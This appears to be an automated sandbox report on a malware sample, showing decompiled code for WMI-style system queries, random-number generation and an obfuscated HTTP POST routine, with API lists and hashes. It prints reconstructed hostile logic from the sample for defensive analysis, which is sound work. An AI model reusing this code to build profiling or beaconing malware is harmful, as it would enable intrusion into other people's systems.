            Function 0445EACA Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 50%
            			E0445EACA(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0445E485(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E04458DC9(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E04458DDF( &_v60, 0xfffffffe);
					E0445E539( &_v104);
					return _t320;
				}
				_t165 = E04459F85(_t255, 0xcdd);
				 *_t328 = 0x6b4;
				_v52 = _t165;
				_t166 = E04459F85(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E04459C50(_t165);
				_v60 = _t322;
				E04458D9A( &_v52);
				E04458D9A( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E04459F85(_t255, 0xc93);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E04458D9A( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E04458DDF( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E04459AB3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E04459AB3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E04458E5D(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E04458DC9( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E04458DDF(_t136, 0);
								E04458DDF( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E04459AB3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E04459F85(_t281, 0xcc1);
								 *_t329 = 0xabe;
								_t217 = E04459F85(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E04458DC9(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E04458D9A( &_v92);
											E04458D9A( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E04459FE4();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E04458DC9(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E04459F85(_t283, 0x2a);
										E04459FE4( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E04458D9A( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E04459AB3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0445E9AE( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E04458DDF( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































            0x0445ead3
            0x0445ead9
            0x0445eae0
            0x0445eae3
            0x0445eae6
            0x0445eaeb
            0x0445eaed
            0x0445eaf2
            0x0445ef37
            0x0445ef37
            0x0445eaff
            0x0445eb01
            0x0445eb04
            0x0445eb07
            0x0445ef1c
            0x0445ef22
            0x0445ef2c
            0x00000000
            0x0445ef31
            0x0445eb12
            0x0445eb19
            0x0445eb20
            0x0445eb23
            0x0445eb28
            0x0445eb2a
            0x0445eb2d
            0x0445eb30
            0x0445eb31
            0x0445eb3a
            0x0445eb40
            0x0445eb43
            0x0445eb4c
            0x0445eb51
            0x0445eb56
            0x0445eb6d
            0x0445eb7a
            0x0445eb7d
            0x0445eb84
            0x0445eb89
            0x0445eb90
            0x0445eb95
            0x0445eb9c
            0x0445eb9e
            0x0445ebaa
            0x0445ebad
            0x0445ebaf
            0x0445ef0c
            0x0445ef0d
            0x0445ef16
            0x00000000
            0x0445ef16
            0x0445ebb5
            0x0445ebb8
            0x0445ebbb
            0x0445ebbe
            0x0445ebc0
            0x0445eed8
            0x0445eedb
            0x0445eede
            0x0445eee0
            0x0445ef02
            0x0445ef07
            0x0445eee2
            0x0445eee5
            0x0445eef0
            0x0445eef7
            0x0445eef7
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0445ebc6
            0x0445ebc6
            0x0445ebd8
            0x0445ebdb
            0x0445ebdd
            0x00000000
            0x00000000
            0x0445ebe5
            0x0445ebe8
            0x0445ebeb
            0x0445ebee
            0x0445ebf1
            0x0445ebf4
            0x00000000
            0x00000000
            0x0445ebfa
            0x0445ec08
            0x0445ec0b
            0x0445ec0d
            0x0445ec26
            0x0445ec35
            0x0445ec3d
            0x0445ec3d
            0x0445ec40
            0x0445ec47
            0x0445ec4b
            0x0445ec51
            0x0445ec53
            0x0445eec0
            0x0445eec6
            0x0445eecc
            0x0445eecf
            0x0445eecf
            0x00000000
            0x0445eecf
            0x0445ec62
            0x0445ec76
            0x0445ec7a
            0x0445ec7c
            0x0445ec81
            0x0445ee8d
            0x0445ee93
            0x0445ee9e
            0x0445eea9
            0x0445eeaf
            0x0445eeb5
            0x0445eeb8
            0x00000000
            0x0445eeb8
            0x0445ec87
            0x0445ee5b
            0x0445ee5b
            0x0445ee5e
            0x0445ee61
            0x00000000
            0x00000000
            0x0445ec8f
            0x0445ec97
            0x0445ec9e
            0x0445eca4
            0x0445eca6
            0x00000000
            0x00000000
            0x0445ecaf
            0x0445ecc4
            0x0445ecca
            0x0445ecd3
            0x0445ecd6
            0x0445ecd9
            0x0445ecdb
            0x0445ee4e
            0x0445ee51
            0x0445ee5a
            0x0445ee5a
            0x00000000
            0x0445ee5a
            0x0445eceb
            0x0445ecee
            0x0445ecf5
            0x0445ecfb
            0x0445ecfe
            0x0445ed01
            0x0445ed04
            0x0445ed07
            0x0445ed43
            0x0445ed43
            0x0445ed46
            0x0445edef
            0x0445ee03
            0x0445ee13
            0x0445ee17
            0x0445ee19
            0x0445ee30
            0x0445ee34
            0x0445ee3d
            0x0445ee48
            0x00000000
            0x0445ee48
            0x0445ee1f
            0x0445ee20
            0x0445ee25
            0x0445ee25
            0x0445ee27
            0x0445ee28
            0x0445ee2d
            0x00000000
            0x0445ee2d
            0x0445ed4c
            0x0445ed4c
            0x0445ed4f
            0x0445edb7
            0x0445edcb
            0x0445eddb
            0x0445eddf
            0x0445ede1
            0x00000000
            0x00000000
            0x0445ede7
            0x0445ede8
            0x00000000
            0x0445ede8
            0x0445ed51
            0x0445ed51
            0x0445ed54
            0x00000000
            0x00000000
            0x0445ed56
            0x0445ed59
            0x00000000
            0x00000000
            0x0445ed5b
            0x0445ed5b
            0x0445ed61
            0x0445ed7a
            0x0445ed89
            0x0445ed92
            0x0445ed97
            0x0445ed9a
            0x0445eda0
            0x0445eda0
            0x0445eda5
            0x0445edb1
            0x00000000
            0x0445edb1
            0x0445ed66
            0x00000000
            0x0445ed66
            0x0445ed09
            0x0445ed30
            0x0445ed35
            0x0445ed3a
            0x0445ed3c
            0x0445ed3c
            0x00000000
            0x0445ed3a
            0x0445ed0b
            0x0445ed0b
            0x0445ed0e
            0x00000000
            0x00000000
            0x0445ed14
            0x0445ed14
            0x0445ed17
            0x00000000
            0x00000000
            0x0445ed1d
            0x0445ed1d
            0x0445ed20
            0x00000000
            0x00000000
            0x0445ed26
            0x0445ed29
            0x00000000
            0x00000000
            0x0445ed2b
            0x00000000
            0x0445ed2b
            0x0445ee6a
            0x0445ee70
            0x0445ee76
            0x0445ee79
            0x0445ee7c
            0x0445ee7c
            0x0445ee7f
            0x0445ee80
            0x0445ee83
            0x0445ee85
            0x00000000
            0x00000000
            0x0445eed5
            0x0445eed5
            0x00000000
            0x0445eed5
            0x0445ec0f
            0x0445ec15
            0x00000000
            0x0445ec15
            0x0445eed2
            0x00000000
            0x0445eb58
            0x0445eb5d
            0x0445eb62
            0x00000000
            0x0445eb66

            APIs
              • Part of subcall function 0445E485: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0445E7B4,00000E16,00000000,00000000,00000005), ref: 0445E498
              • Part of subcall function 0445E485: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0445E7B4,00000E16,00000000,00000000,00000005), ref: 0445E4A9
              • Part of subcall function 0445E485: CoCreateInstance.OLE32(0446C8A0,00000000,00000001,0446C8B0,00000000,?,0445E7B4,00000E16,00000000,00000000,00000005), ref: 0445E4C0
              • Part of subcall function 0445E485: SysAllocString.OLEAUT32(00000000), ref: 0445E4CB
              • Part of subcall function 0445E485: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0445E7B4,00000E16,00000000,00000000,00000005), ref: 0445E4F6
              • Part of subcall function 04458DC9: RtlAllocateHeap.NTDLL(00000008,?,?,04459793,00000100,?,0445661B), ref: 04458DD7
            • SysAllocString.OLEAUT32(00000000), ref: 0445EB73
            • SysAllocString.OLEAUT32(00000000), ref: 0445EB87
            • SysFreeString.OLEAUT32(?), ref: 0445EF0D
            • SysFreeString.OLEAUT32(?), ref: 0445EF16
              • Part of subcall function 04458DDF: HeapFree.KERNEL32(00000000,00000000), ref: 04458E25
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
            • String ID: FALSE$TRUE
            • API String ID: 1290676130-1412513891
            • Opcode ID: 10172a3e4ffad5d93d9237fe031c4cb89d21e692db10e3fc684176c45b127480
            • Instruction ID: faee74862e6d97fe68906786a7a87d8891f141f6b9c1496be61e852872f0d8f4
            • Opcode Fuzzy Hash: 10172a3e4ffad5d93d9237fe031c4cb89d21e692db10e3fc684176c45b127480
            • Instruction Fuzzy Hash: 52E14171A00219EFEF14DFA5C884AEEBBB9FF48304F10455EE905A7262DB74BA05CB50
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04462951 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66libraryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 30%
            			E04462951(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E044628AC( &_v16);
				return 0;
			}











            0x04462957
            0x04462969
            0x0446296d
            0x044629e1
            0x00000000
            0x044629e3
            0x0446297d
            0x04462981
            0x00000000
            0x00000000
            0x04462989
            0x0446298b
            0x04462990
            0x00000000
            0x00000000
            0x0446299a
            0x0446299e
            0x00000000
            0x00000000
            0x044629a0
            0x044629a5
            0x044629a7
            0x044629a9
            0x044629ae
            0x044629b3
            0x00000000
            0x00000000
            0x044629be
            0x044629c8
            0x044629cc
            0x00000000
            0x00000000
            0x044629db
            0x00000000

            APIs
            • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,04457C84), ref: 04462963
            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 0446297B
            • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 04462989
            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 04462998
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleModule
            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
            • API String ID: 667068680-129414566
            • Opcode ID: bda05ba0605649b29c97974297542f7f1a5acad8fddb60484c5b27500f015006
            • Instruction ID: 0b8f892e993dfed817391a5313a6b49cac07b5e73bbb8be2a3427f6b675fdc5b
            • Opcode Fuzzy Hash: bda05ba0605649b29c97974297542f7f1a5acad8fddb60484c5b27500f015006
            • Instruction Fuzzy Hash: BC11AC72B4471977DF11ABB59C42F9FB6ACAF85750F110162EA02F7240DAF0ED048956
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445F7A3 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 268COMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E0445F7A3(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				int _v68;
				void* _v72;
				intOrPtr _v92;
				int _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char* _v112;
				char _v116;
				char _v132;
				void _v388;
				void _v644;
				intOrPtr _t94;
				intOrPtr _t102;
				signed int _t104;
				intOrPtr* _t105;
				intOrPtr _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				signed int _t116;
				char _t117;
				intOrPtr _t119;
				char _t122;
				intOrPtr _t127;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t139;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t163;
				signed int _t165;
				void* _t166;
				intOrPtr _t179;
				signed int _t186;
				char _t188;
				signed int _t189;
				void* _t190;
				char _t193;
				signed int _t194;
				signed int _t195;
				void* _t196;

				_v24 = 4;
				_v32 = 0;
				_v28 = 1;
				_t190 = __edx;
				memset( &_v388, 0, 0x100);
				memset( &_v644, 0, 0x100);
				_t166 = 0x65;
				_v56 = E04459F6B(_t166);
				_v52 = E04459F6B(0xcc6);
				_v48 = E04459F6B(0xe03);
				_v44 = E04459F6B(0x64c);
				_t94 = E04459F6B(0x80a);
				_v36 = _v36 & 0;
				_t188 = 0x3c;
				_v40 = _t94;
				E04458F63( &_v116, 0, 0x100);
				_v108 = 0x10;
				_v112 =  &_v132;
				_v116 = _t188;
				_v100 =  &_v388;
				_v96 = 0x100;
				_v72 =  &_v644;
				_push( &_v116);
				_push(0);
				_v68 = 0x100;
				_push(E0445A5D0(_t190));
				_t102 =  *0x446f8f0; // 0x0
				_push(_t190);
				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
					_t104 = 0;
					__eflags = 0;
					_v12 = 0;
					do {
						_t105 =  *0x446f8f0; // 0x0
						_v8 = 0x8404f700;
						_t189 =  *_t105( *0x446f9d8,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
						__eflags = _t189;
						if(_t189 != 0) {
							E0445F73B(_t189);
							_t110 =  *0x446f8f0; // 0x0
							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t165 = _t111;
							if(_a24 != 0) {
								E0445A1F8(_a24);
							}
							__eflags = _t165;
							if(_t165 != 0) {
								__eflags = _v104 - 4;
								_t112 = 0x8484f700;
								if(_v104 != 4) {
									_t112 = _v8;
								}
								_t115 =  *0x446f8f0; // 0x0
								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
								_v8 = _t116;
								__eflags = _a24;
								if(_a24 != 0) {
									E0445A1F8(_a24);
									_t116 = _v8;
								}
								__eflags = _t116;
								if(_t116 != 0) {
									__eflags = _v104 - 4;
									if(_v104 == 4) {
										E0445F6E9(_t116);
									}
									_t117 = E04459F6B(0x82e);
									_t193 = _t117;
									_v16 = _t193;
									_t119 =  *0x446f8f0; // 0x0
									_t194 = _v8;
									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E0445A5D0(_t193), _a4, _a8);
									E04458D87( &_v16);
									__eflags = _a24;
									if(_a24 != 0) {
										E0445A1F8(_a24);
									}
									__eflags = _v8;
									if(_v8 != 0) {
										L25:
										_t122 = 8;
										_v24 = _t122;
										_v20 = 0;
										_v16 = 0;
										E04458F63( &_v20, 0, _t122);
										_t127 =  *0x446f8f0; // 0x0
										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
										if(__eflags != 0) {
											_t129 = E0445A102( &_v20, __eflags);
											__eflags = _t129 - 0xc8;
											if(_t129 == 0xc8) {
												 *_a20 = _t194;
												 *_a12 = _t189;
												 *_a16 = _t165;
												__eflags = 0;
												return 0;
											}
											_v12 =  ~_t129;
											L29:
											_t135 =  *0x446f8f0; // 0x0
											 *((intOrPtr*)(_t135 + 8))(_t194);
											_t195 = _v12;
											L30:
											__eflags = _t165;
											if(_t165 != 0) {
												_t139 =  *0x446f8f0; // 0x0
												 *((intOrPtr*)(_t139 + 8))(_t165);
											}
											__eflags = _t189;
											if(_t189 != 0) {
												_t179 =  *0x446f8f0; // 0x0
												 *((intOrPtr*)(_t179 + 8))(_t189);
											}
											return _t195;
										}
										GetLastError();
										_v12 = 0xfffffff8;
										goto L29;
									} else {
										GetLastError();
										_t143 =  *0x446f8f0; // 0x0
										 *((intOrPtr*)(_t143 + 8))(_t194);
										_t145 =  *0x446f8f0; // 0x0
										_v8 = _v8 & 0x00000000;
										 *((intOrPtr*)(_t145 + 8))(_t165);
										_t147 =  *0x446f8f0; // 0x0
										_t165 = 0;
										__eflags = 0;
										 *((intOrPtr*)(_t147 + 8))(_t189);
										_t194 = _v8;
										goto L21;
									}
								} else {
									GetLastError();
									_t153 =  *0x446f8f0; // 0x0
									 *((intOrPtr*)(_t153 + 8))(_t165);
									_t155 =  *0x446f8f0; // 0x0
									_t165 = 0;
									 *((intOrPtr*)(_t155 + 8))(_t189);
									_t189 = 0;
									_t194 = _v8;
									goto L22;
								}
							} else {
								GetLastError();
								_t159 =  *0x446f8f0; // 0x0
								 *((intOrPtr*)(_t159 + 8))(_t189);
								L21:
								_t189 = 0;
								__eflags = 0;
								goto L22;
							}
						}
						GetLastError();
						L22:
						_t186 = _t194;
						_t104 = _v12 + 1;
						_v12 = _t104;
						__eflags = _t104 - 2;
					} while (_t104 < 2);
					__eflags = _t186;
					if(_t186 != 0) {
						goto L25;
					}
					_t195 = 0xfffffffe;
					goto L30;
				}
				_t163 = 0xfffffffc;
				return _t163;
			}






























































            0x0445f7b1
            0x0445f7bd
            0x0445f7c4
            0x0445f7d1
            0x0445f7d4
            0x0445f7e5
            0x0445f7ef
            0x0445f7fa
            0x0445f807
            0x0445f814
            0x0445f821
            0x0445f824
            0x0445f829
            0x0445f82e
            0x0445f830
            0x0445f838
            0x0445f840
            0x0445f847
            0x0445f853
            0x0445f856
            0x0445f864
            0x0445f867
            0x0445f86d
            0x0445f86e
            0x0445f870
            0x0445f879
            0x0445f87a
            0x0445f87f
            0x0445f885
            0x0445f88f
            0x0445f88f
            0x0445f891
            0x0445f896
            0x0445f8a0
            0x0445f8ab
            0x0445f8b4
            0x0445f8b6
            0x0445f8b8
            0x0445f8c7
            0x0445f8de
            0x0445f8e4
            0x0445f8e7
            0x0445f8eb
            0x0445f8ed
            0x0445f8f2
            0x0445f8f2
            0x0445f8f7
            0x0445f8f9
            0x0445f90f
            0x0445f913
            0x0445f918
            0x0445f91a
            0x0445f91a
            0x0445f92e
            0x0445f939
            0x0445f93c
            0x0445f93f
            0x0445f942
            0x0445f947
            0x0445f94c
            0x0445f94c
            0x0445f94f
            0x0445f951
            0x0445f977
            0x0445f97b
            0x0445f97f
            0x0445f97f
            0x0445f989
            0x0445f991
            0x0445f996
            0x0445f9a1
            0x0445f9a7
            0x0445f9b1
            0x0445f9b4
            0x0445f9b9
            0x0445f9bd
            0x0445f9c2
            0x0445f9c2
            0x0445f9c7
            0x0445f9cb
            0x0445fa16
            0x0445fa18
            0x0445fa1b
            0x0445fa23
            0x0445fa27
            0x0445fa2a
            0x0445fa3c
            0x0445fa47
            0x0445fa49
            0x0445fa5d
            0x0445fa62
            0x0445fa67
            0x0445fa9c
            0x0445faa1
            0x0445faa6
            0x0445faa8
            0x00000000
            0x0445faa8
            0x0445fa6b
            0x0445fa6e
            0x0445fa6e
            0x0445fa74
            0x0445fa77
            0x0445fa7a
            0x0445fa7a
            0x0445fa7c
            0x0445fa7e
            0x0445fa84
            0x0445fa84
            0x0445fa87
            0x0445fa89
            0x0445fa8b
            0x0445fa92
            0x0445fa92
            0x00000000
            0x0445fa95
            0x0445fa4b
            0x0445fa51
            0x00000000
            0x0445f9cd
            0x0445f9cd
            0x0445f9d3
            0x0445f9d9
            0x0445f9dc
            0x0445f9e1
            0x0445f9e6
            0x0445f9e9
            0x0445f9ee
            0x0445f9ee
            0x0445f9f1
            0x0445f9f4
            0x00000000
            0x0445f9f4
            0x0445f953
            0x0445f953
            0x0445f959
            0x0445f95f
            0x0445f962
            0x0445f967
            0x0445f96a
            0x0445f96d
            0x0445f96f
            0x00000000
            0x0445f96f
            0x0445f8fb
            0x0445f8fb
            0x0445f901
            0x0445f907
            0x0445f9f7
            0x0445f9f7
            0x0445f9f7
            0x00000000
            0x0445f9f7
            0x0445f8f9
            0x0445f8ba
            0x0445f9f9
            0x0445f9fc
            0x0445f9fe
            0x0445fa01
            0x0445fa04
            0x0445fa04
            0x0445fa0d
            0x0445fa0f
            0x00000000
            0x00000000
            0x0445fa13
            0x00000000
            0x0445fa13
            0x0445f889
            0x00000000

            APIs
            • memset.MSVCRT ref: 0445F7D4
            • memset.MSVCRT ref: 0445F7E5
              • Part of subcall function 04458F63: memset.MSVCRT ref: 04458F75
            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0445F8BA
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: memset$ErrorLast
            • String ID: POST
            • API String ID: 2570506013-1814004025
            • Opcode ID: 8e9cb119b7c2d2ad8c45a554448c4167279de8144646e14866876dae64334762
            • Instruction ID: 8759a65efb3bdc4e982c89f754ca664fe65ca7c664780cb1657034ab41371f7c
            • Opcode Fuzzy Hash: 8e9cb119b7c2d2ad8c45a554448c4167279de8144646e14866876dae64334762
            • Instruction Fuzzy Hash: 45A18271A00719EFEF10DFA5D848AAE77B8FF48314F14406AE905E7252DB34AE49CB52
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044614C5 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
